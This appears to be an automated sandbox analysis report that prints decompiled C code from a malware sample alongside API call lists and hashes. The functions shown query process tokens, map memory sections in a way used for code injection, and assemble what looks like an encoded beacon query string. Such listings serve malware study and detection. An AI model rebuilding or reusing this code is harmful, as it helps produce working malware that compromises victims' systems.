                                                                                                                                                                                              						_t47 = __imp__;
                                                                                                                                                                                              						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                                                                              						_t44 = E00DF58BE(_a4);
                                                                                                                                                                                              						if(_t44 != 0) {
                                                                                                                                                                                              							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                                                                              							if(_t40 >= 0) {
                                                                                                                                                                                              								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                                                                              								_t48 = 1;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							E00DF147E(_t44);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						NtClose(_v8); // executed
                                                                                                                                                                                              					}
                                                                                                                                                                                              					NtClose(_v12);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t48;
                                                                                                                                                                                              			}



















                                                                                                                                                                                              0x00df71c6
                                                                                                                                                                                              0x00df71c7
                                                                                                                                                                                              0x00df71c8
                                                                                                                                                                                              0x00df71c9
                                                                                                                                                                                              0x00df71ca
                                                                                                                                                                                              0x00df71ce
                                                                                                                                                                                              0x00df71d5
                                                                                                                                                                                              0x00df71e4
                                                                                                                                                                                              0x00df71e7
                                                                                                                                                                                              0x00df71ea
                                                                                                                                                                                              0x00df71f1
                                                                                                                                                                                              0x00df71f4
                                                                                                                                                                                              0x00df71f7
                                                                                                                                                                                              0x00df71fa
                                                                                                                                                                                              0x00df71fd
                                                                                                                                                                                              0x00df7208
                                                                                                                                                                                              0x00df720a
                                                                                                                                                                                              0x00df7213
                                                                                                                                                                                              0x00df721b
                                                                                                                                                                                              0x00df721d
                                                                                                                                                                                              0x00df722f
                                                                                                                                                                                              0x00df7239
                                                                                                                                                                                              0x00df723d
                                                                                                                                                                                              0x00df724c
                                                                                                                                                                                              0x00df7250
                                                                                                                                                                                              0x00df7259
                                                                                                                                                                                              0x00df7261
                                                                                                                                                                                              0x00df7261
                                                                                                                                                                                              0x00df7263
                                                                                                                                                                                              0x00df7263
                                                                                                                                                                                              0x00df726b
                                                                                                                                                                                              0x00df7271
                                                                                                                                                                                              0x00df7275
                                                                                                                                                                                              0x00df7275
                                                                                                                                                                                              0x00df7280

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00DF7200
                                                                                                                                                                                              • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00DF7213
                                                                                                                                                                                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00DF722F
                                                                                                                                                                                                • Part of subcall function 00DF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00DF724C
                                                                                                                                                                                              • memcpy.NTDLL(?,00000000,0000001C), ref: 00DF7259
                                                                                                                                                                                              • NtClose.NTDLL(?), ref: 00DF726B
                                                                                                                                                                                              • NtClose.NTDLL(00000000), ref: 00DF7275
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2575439697-0
                                                                                                                                                                                              • Opcode ID: ab65d8d766c8250dc4bfed5b68abcf99cad5c6540fd4b4140af78e6b423750de
                                                                                                                                                                                              • Instruction ID: 5e55b745f024df2def39e31ff247a5e98dff24308efdafd3792c17f7c666ea1d
                                                                                                                                                                                              • Opcode Fuzzy Hash: ab65d8d766c8250dc4bfed5b68abcf99cad5c6540fd4b4140af78e6b423750de
                                                                                                                                                                                              • Instruction Fuzzy Hash: E821F4B291021CBBDB019F94DD859EEBFBDEB08740F108026FA00E6220D7718A65DBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                              			E00A81A34(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				void* _v20;
                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                              				int _v28;
                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                              				int _v40;
                                                                                                                                                                                              				int _v44;
                                                                                                                                                                                              				void* _v48;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				long _t34;
                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                              				intOrPtr* _t48;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t48 = __eax;
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                              				_v16 = 0;
                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                              				_v48 = 0x18;
                                                                                                                                                                                              				_v44 = 0;
                                                                                                                                                                                              				_v36 = 0x40;
                                                                                                                                                                                              				_v40 = 0;
                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                              				_v28 = 0;
                                                                                                                                                                                              				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                                              				if(_t34 < 0) {
                                                                                                                                                                                              					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					 *_t48 = _v16;
                                                                                                                                                                                              					_t39 = E00A810BA(_t48,  &_v12); // executed
                                                                                                                                                                                              					_t47 = _t39;
                                                                                                                                                                                              					if(_t47 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						memset(_v12, 0, _v24);
                                                                                                                                                                                              						 *_a4 = _v12;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t47;
                                                                                                                                                                                              			}


















                                                                                                                                                                                              0x00a81a3d
                                                                                                                                                                                              0x00a81a44
                                                                                                                                                                                              0x00a81a45
                                                                                                                                                                                              0x00a81a46
                                                                                                                                                                                              0x00a81a47
                                                                                                                                                                                              0x00a81a48
                                                                                                                                                                                              0x00a81a59
                                                                                                                                                                                              0x00a81a5d
                                                                                                                                                                                              0x00a81a71
                                                                                                                                                                                              0x00a81a74
                                                                                                                                                                                              0x00a81a77
                                                                                                                                                                                              0x00a81a7e
                                                                                                                                                                                              0x00a81a81
                                                                                                                                                                                              0x00a81a88
                                                                                                                                                                                              0x00a81a8b
                                                                                                                                                                                              0x00a81a8e
                                                                                                                                                                                              0x00a81a91
                                                                                                                                                                                              0x00a81a96
                                                                                                                                                                                              0x00a81ad1
                                                                                                                                                                                              0x00a81a98
                                                                                                                                                                                              0x00a81a9b
                                                                                                                                                                                              0x00a81aa1
                                                                                                                                                                                              0x00a81aa6
                                                                                                                                                                                              0x00a81aaa
                                                                                                                                                                                              0x00a81ac8
                                                                                                                                                                                              0x00a81aac
                                                                                                                                                                                              0x00a81ab3
                                                                                                                                                                                              0x00a81ac1
                                                                                                                                                                                              0x00a81ac1
                                                                                                                                                                                              0x00a81aaa
                                                                                                                                                                                              0x00a81ad9

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 00A81A91
                                                                                                                                                                                                • Part of subcall function 00A810BA: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00A81AA6,00000002,00000000,?,?,00000000,?,?,00A81AA6,00000002), ref: 00A810E7
                                                                                                                                                                                              • memset.NTDLL ref: 00A81AB3
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Section$CreateViewmemset
                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                              • API String ID: 2533685722-2766056989
                                                                                                                                                                                              • Opcode ID: aaaf58aa3bdd7b37c329ea1a53909f0b58be6d2e70c64ad720e0741f46616211
                                                                                                                                                                                              • Instruction ID: 5df7de26aa0aea9bd2b6869abb66c37013fb3a0b1e01497d1e87587949709391
                                                                                                                                                                                              • Opcode Fuzzy Hash: aaaf58aa3bdd7b37c329ea1a53909f0b58be6d2e70c64ad720e0741f46616211
                                                                                                                                                                                              • Instruction Fuzzy Hash: B421EDB5D00209AFDB11DFA9C8849DEFBF9FF48354F104569E615F7210D7319A458BA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                              			E00A810BA(void** __esi, PVOID* _a4) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				long _t13;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v16 = 0;
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                                              				if(_t13 < 0) {
                                                                                                                                                                                              					_push(_t13);
                                                                                                                                                                                              					return __esi[6]();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}







                                                                                                                                                                                              0x00a810cc
                                                                                                                                                                                              0x00a810d2
                                                                                                                                                                                              0x00a810e0
                                                                                                                                                                                              0x00a810e7
                                                                                                                                                                                              0x00a810ec
                                                                                                                                                                                              0x00a810f2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a810f3
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00A81AA6,00000002,00000000,?,?,00000000,?,?,00A81AA6,00000002), ref: 00A810E7
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: SectionView
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1323581903-0
                                                                                                                                                                                              • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                              • Instruction ID: d4788a3434667bd4aaef324620d1c50e40ce621202b26ca9caa4fbba82522d08
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CF01CB690020CBFEB119FA5DC85CAFBBBDEB44394B104939B252E1090D6309E499B60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                                              			E00DF1754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				void* _v20;
                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                              				long _t60;
                                                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                                                              				intOrPtr _t62;
                                                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                                                              				intOrPtr _t65;
                                                                                                                                                                                              				void* _t68;
                                                                                                                                                                                              				intOrPtr _t69;
                                                                                                                                                                                              				int _t72;
                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                              				void* _t74;
                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                              				void* _t79;
                                                                                                                                                                                              				intOrPtr _t83;
                                                                                                                                                                                              				intOrPtr _t87;
                                                                                                                                                                                              				intOrPtr* _t89;
                                                                                                                                                                                              				intOrPtr _t95;
                                                                                                                                                                                              				void* _t97;
                                                                                                                                                                                              				intOrPtr _t104;
                                                                                                                                                                                              				signed int _t108;
                                                                                                                                                                                              				char** _t110;
                                                                                                                                                                                              				int _t113;
                                                                                                                                                                                              				signed int _t115;
                                                                                                                                                                                              				intOrPtr* _t116;
                                                                                                                                                                                              				intOrPtr* _t118;
                                                                                                                                                                                              				intOrPtr* _t120;
                                                                                                                                                                                              				intOrPtr* _t122;
                                                                                                                                                                                              				intOrPtr _t125;
                                                                                                                                                                                              				intOrPtr _t130;
                                                                                                                                                                                              				int _t134;
                                                                                                                                                                                              				CHAR* _t136;
                                                                                                                                                                                              				intOrPtr _t137;
                                                                                                                                                                                              				void* _t138;
                                                                                                                                                                                              				void* _t147;
                                                                                                                                                                                              				int _t148;
                                                                                                                                                                                              				void* _t149;
                                                                                                                                                                                              				intOrPtr _t150;
                                                                                                                                                                                              				void* _t152;
                                                                                                                                                                                              				long _t156;
                                                                                                                                                                                              				intOrPtr* _t157;
                                                                                                                                                                                              				intOrPtr* _t158;
                                                                                                                                                                                              				intOrPtr* _t161;
                                                                                                                                                                                              				void* _t162;
                                                                                                                                                                                              				void* _t164;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t147 = __edx;
                                                                                                                                                                                              				_t138 = __ecx;
                                                                                                                                                                                              				_t60 = __eax;
                                                                                                                                                                                              				_v12 = 8;
                                                                                                                                                                                              				if(__eax == 0) {
                                                                                                                                                                                              					_t60 = GetTickCount();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t61 =  *0xdfd018; // 0x1f7541c4
                                                                                                                                                                                              				asm("bswap eax");
                                                                                                                                                                                              				_t62 =  *0xdfd014; // 0x3a87c8cd
                                                                                                                                                                                              				_t136 = _a16;
                                                                                                                                                                                              				asm("bswap eax");
                                                                                                                                                                                              				_t63 =  *0xdfd010; // 0xd8d2f808
                                                                                                                                                                                              				asm("bswap eax");
                                                                                                                                                                                              				_t64 =  *0xdfd00c; // 0xeec43f25
                                                                                                                                                                                              				asm("bswap eax");
                                                                                                                                                                                              				_t65 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_t3 = _t65 + 0xdfe633; // 0x74666f73
                                                                                                                                                                                              				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0xdfd02c,  *0xdfd004, _t60);
                                                                                                                                                                                              				_t68 = E00DF57AB();
                                                                                                                                                                                              				_t69 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_t4 = _t69 + 0xdfe673; // 0x74707526
                                                                                                                                                                                              				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
                                                                                                                                                                                              				_t164 = _t162 + 0x38;
                                                                                                                                                                                              				_t149 = _t148 + _t72; // executed
                                                                                                                                                                                              				_t73 = E00DF73E9(_t138); // executed
                                                                                                                                                                                              				_t137 = __imp__;
                                                                                                                                                                                              				_v8 = _t73;
                                                                                                                                                                                              				if(_t73 != 0) {
                                                                                                                                                                                              					_t130 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_t7 = _t130 + 0xdfe8cb; // 0x736e6426
                                                                                                                                                                                              					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
                                                                                                                                                                                              					_t164 = _t164 + 0xc;
                                                                                                                                                                                              					_t149 = _t149 + _t134;
                                                                                                                                                                                              					HeapFree( *0xdfd238, 0, _v8);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t74 = E00DF614A();
                                                                                                                                                                                              				_v8 = _t74;
                                                                                                                                                                                              				if(_t74 != 0) {
                                                                                                                                                                                              					_t125 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_t11 = _t125 + 0xdfe8d3; // 0x6f687726
                                                                                                                                                                                              					wsprintfA(_t149 + _a16, _t11, _t74);
                                                                                                                                                                                              					_t164 = _t164 + 0xc;
                                                                                                                                                                                              					HeapFree( *0xdfd238, 0, _v8);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t150 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              				_t76 = E00DF757B(0xdfd00a, _t150 + 4);
                                                                                                                                                                                              				_t156 = 0;
                                                                                                                                                                                              				_v20 = _t76;
                                                                                                                                                                                              				if(_t76 == 0) {
                                                                                                                                                                                              					L26:
                                                                                                                                                                                              					RtlFreeHeap( *0xdfd238, _t156, _a16); // executed
                                                                                                                                                                                              					return _v12;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t79 = RtlAllocateHeap( *0xdfd238, 0, 0x800);
                                                                                                                                                                                              					_v8 = _t79;
                                                                                                                                                                                              					if(_t79 == 0) {
                                                                                                                                                                                              						L25:
                                                                                                                                                                                              						HeapFree( *0xdfd238, _t156, _v20);
                                                                                                                                                                                              						goto L26;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E00DF749F(GetTickCount());
                                                                                                                                                                                              					_t83 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              					__imp__(_t83 + 0x40);
                                                                                                                                                                                              					asm("lock xadd [eax], ecx");
                                                                                                                                                                                              					_t87 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              					__imp__(_t87 + 0x40);
                                                                                                                                                                                              					_t89 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              					_t152 = E00DF4D2C(1, _t147, _a16,  *_t89);
                                                                                                                                                                                              					_v28 = _t152;
                                                                                                                                                                                              					asm("lock xadd [eax], ecx");
                                                                                                                                                                                              					if(_t152 == 0) {
                                                                                                                                                                                              						L24:
                                                                                                                                                                                              						RtlFreeHeap( *0xdfd238, _t156, _v8); // executed
                                                                                                                                                                                              						goto L25;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					StrTrimA(_t152, 0xdfc294);
                                                                                                                                                                                              					_t95 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_push(_t152);
                                                                                                                                                                                              					_t18 = _t95 + 0xdfe252; // 0x616d692f
                                                                                                                                                                                              					_t97 = E00DF9DEF(_t18);
                                                                                                                                                                                              					_v16 = _t97;
                                                                                                                                                                                              					if(_t97 == 0) {
                                                                                                                                                                                              						L23:
                                                                                                                                                                                              						RtlFreeHeap( *0xdfd238, _t156, _t152); // executed
                                                                                                                                                                                              						goto L24;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t157 = __imp__;
                                                                                                                                                                                              					 *_t157(_t152, _a4);
                                                                                                                                                                                              					 *_t157(_v8, _v20);
                                                                                                                                                                                              					_t158 = __imp__;
                                                                                                                                                                                              					 *_t158(_v8, _v16);
                                                                                                                                                                                              					 *_t158(_v8, _t152);
                                                                                                                                                                                              					_t104 = E00DFA5E9(0, _v8);
                                                                                                                                                                                              					_a4 = _t104;
                                                                                                                                                                                              					if(_t104 == 0) {
                                                                                                                                                                                              						_v12 = 8;
                                                                                                                                                                                              						L21:
                                                                                                                                                                                              						E00DF6106();
                                                                                                                                                                                              						L22:
                                                                                                                                                                                              						HeapFree( *0xdfd238, 0, _v16);
                                                                                                                                                                                              						_t156 = 0;
                                                                                                                                                                                              						goto L23;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t108 = E00DF2F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
                                                                                                                                                                                              					_v12 = _t108;
                                                                                                                                                                                              					if(_t108 == 0) {
                                                                                                                                                                                              						_t161 = _v24;
                                                                                                                                                                                              						_t115 = E00DFA060(_t161, _a4, _a8, _a12); // executed
                                                                                                                                                                                              						_v12 = _t115;
                                                                                                                                                                                              						_t116 =  *((intOrPtr*)(_t161 + 8));
                                                                                                                                                                                              						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                                                                                                                                                                              						_t118 =  *((intOrPtr*)(_t161 + 8));
                                                                                                                                                                                              						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                                                                                              						_t120 =  *((intOrPtr*)(_t161 + 4));
                                                                                                                                                                                              						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                                                                                                                                                                              						_t122 =  *_t161;
                                                                                                                                                                                              						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                                                                                                                                                                              						E00DF147E(_t161);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_v12 != 0x10d2) {
                                                                                                                                                                                              						L16:
                                                                                                                                                                                              						if(_v12 == 0) {
                                                                                                                                                                                              							_t110 = _a8;
                                                                                                                                                                                              							if(_t110 != 0) {
                                                                                                                                                                                              								_t153 =  *_t110;
                                                                                                                                                                                              								_t159 =  *_a12;
                                                                                                                                                                                              								wcstombs( *_t110,  *_t110,  *_a12);
                                                                                                                                                                                              								_t113 = E00DF1600(_t153, _t153, _t159 >> 1);
                                                                                                                                                                                              								_t152 = _v28;
                                                                                                                                                                                              								 *_a12 = _t113;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L19;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						if(_a8 != 0) {
                                                                                                                                                                                              							L19:
                                                                                                                                                                                              							E00DF147E(_a4);
                                                                                                                                                                                              							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                                                                              								goto L22;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								goto L21;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}























































                                                                                                                                                                                              0x00df1754
                                                                                                                                                                                              0x00df1754
                                                                                                                                                                                              0x00df1754
                                                                                                                                                                                              0x00df175d
                                                                                                                                                                                              0x00df1766
                                                                                                                                                                                              0x00df1768
                                                                                                                                                                                              0x00df1768
                                                                                                                                                                                              0x00df1775
                                                                                                                                                                                              0x00df1780
                                                                                                                                                                                              0x00df1783
                                                                                                                                                                                              0x00df1788
                                                                                                                                                                                              0x00df1791
                                                                                                                                                                                              0x00df1794
                                                                                                                                                                                              0x00df1799
                                                                                                                                                                                              0x00df179c
                                                                                                                                                                                              0x00df17a1
                                                                                                                                                                                              0x00df17a4
                                                                                                                                                                                              0x00df17b0
                                                                                                                                                                                              0x00df17bd
                                                                                                                                                                                              0x00df17bf
                                                                                                                                                                                              0x00df17c5
                                                                                                                                                                                              0x00df17ca
                                                                                                                                                                                              0x00df17d5
                                                                                                                                                                                              0x00df17d7
                                                                                                                                                                                              0x00df17da
                                                                                                                                                                                              0x00df17dc
                                                                                                                                                                                              0x00df17e1
                                                                                                                                                                                              0x00df17e7
                                                                                                                                                                                              0x00df17ec
                                                                                                                                                                                              0x00df17ef
                                                                                                                                                                                              0x00df17f4
                                                                                                                                                                                              0x00df1801
                                                                                                                                                                                              0x00df1803
                                                                                                                                                                                              0x00df1809
                                                                                                                                                                                              0x00df1813
                                                                                                                                                                                              0x00df1813
                                                                                                                                                                                              0x00df1815
                                                                                                                                                                                              0x00df181a
                                                                                                                                                                                              0x00df181f
                                                                                                                                                                                              0x00df1822
                                                                                                                                                                                              0x00df1827
                                                                                                                                                                                              0x00df1834
                                                                                                                                                                                              0x00df1836
                                                                                                                                                                                              0x00df1844
                                                                                                                                                                                              0x00df1844
                                                                                                                                                                                              0x00df1846
                                                                                                                                                                                              0x00df1854
                                                                                                                                                                                              0x00df1859
                                                                                                                                                                                              0x00df185b
                                                                                                                                                                                              0x00df1860
                                                                                                                                                                                              0x00df1a2f
                                                                                                                                                                                              0x00df1a39
                                                                                                                                                                                              0x00df1a42
                                                                                                                                                                                              0x00df1866
                                                                                                                                                                                              0x00df1872
                                                                                                                                                                                              0x00df1878
                                                                                                                                                                                              0x00df187d
                                                                                                                                                                                              0x00df1a23
                                                                                                                                                                                              0x00df1a2d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df1a2d
                                                                                                                                                                                              0x00df1889
                                                                                                                                                                                              0x00df188e
                                                                                                                                                                                              0x00df1897
                                                                                                                                                                                              0x00df18a8
                                                                                                                                                                                              0x00df18ac
                                                                                                                                                                                              0x00df18b5
                                                                                                                                                                                              0x00df18bb
                                                                                                                                                                                              0x00df18ca
                                                                                                                                                                                              0x00df18d1
                                                                                                                                                                                              0x00df18da
                                                                                                                                                                                              0x00df18e0
                                                                                                                                                                                              0x00df1a17
                                                                                                                                                                                              0x00df1a21
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df1a21
                                                                                                                                                                                              0x00df18ec
                                                                                                                                                                                              0x00df18f2
                                                                                                                                                                                              0x00df18f7
                                                                                                                                                                                              0x00df18f8
                                                                                                                                                                                              0x00df18ff
                                                                                                                                                                                              0x00df1904
                                                                                                                                                                                              0x00df1909
                                                                                                                                                                                              0x00df1a0d
                                                                                                                                                                                              0x00df1a15
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df1a15
                                                                                                                                                                                              0x00df1912
                                                                                                                                                                                              0x00df1919
                                                                                                                                                                                              0x00df1921
                                                                                                                                                                                              0x00df1926
                                                                                                                                                                                              0x00df192f
                                                                                                                                                                                              0x00df1935
                                                                                                                                                                                              0x00df193c
                                                                                                                                                                                              0x00df1941
                                                                                                                                                                                              0x00df1946
                                                                                                                                                                                              0x00df1a45
                                                                                                                                                                                              0x00df19f9
                                                                                                                                                                                              0x00df19f9
                                                                                                                                                                                              0x00df19fe
                                                                                                                                                                                              0x00df1a09
                                                                                                                                                                                              0x00df1a0b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df1a0b
                                                                                                                                                                                              0x00df1950
                                                                                                                                                                                              0x00df1955
                                                                                                                                                                                              0x00df195a
                                                                                                                                                                                              0x00df195f
                                                                                                                                                                                              0x00df196a
                                                                                                                                                                                              0x00df196f
                                                                                                                                                                                              0x00df1972
                                                                                                                                                                                              0x00df1978
                                                                                                                                                                                              0x00df197e
                                                                                                                                                                                              0x00df1984
                                                                                                                                                                                              0x00df1987
                                                                                                                                                                                              0x00df198d
                                                                                                                                                                                              0x00df1990
                                                                                                                                                                                              0x00df1995
                                                                                                                                                                                              0x00df1999
                                                                                                                                                                                              0x00df1999
                                                                                                                                                                                              0x00df19a5
                                                                                                                                                                                              0x00df19b1
                                                                                                                                                                                              0x00df19b5
                                                                                                                                                                                              0x00df19b7
                                                                                                                                                                                              0x00df19bc
                                                                                                                                                                                              0x00df19be
                                                                                                                                                                                              0x00df19c3
                                                                                                                                                                                              0x00df19c8
                                                                                                                                                                                              0x00df19d5
                                                                                                                                                                                              0x00df19dd
                                                                                                                                                                                              0x00df19e0
                                                                                                                                                                                              0x00df19e0
                                                                                                                                                                                              0x00df19bc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df19a7
                                                                                                                                                                                              0x00df19ab
                                                                                                                                                                                              0x00df19e2
                                                                                                                                                                                              0x00df19e5
                                                                                                                                                                                              0x00df19ee
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df19ee
                                                                                                                                                                                              0x00df19ad
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df19ad
                                                                                                                                                                                              0x00df19a5

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00DF1768
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00DF17B8
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00DF17D5
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00DF1801
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00DF1813
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00DF1834
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00DF1844
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DF1872
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00DF1883
                                                                                                                                                                                              • RtlEnterCriticalSection.NTDLL(04C09570), ref: 00DF1897
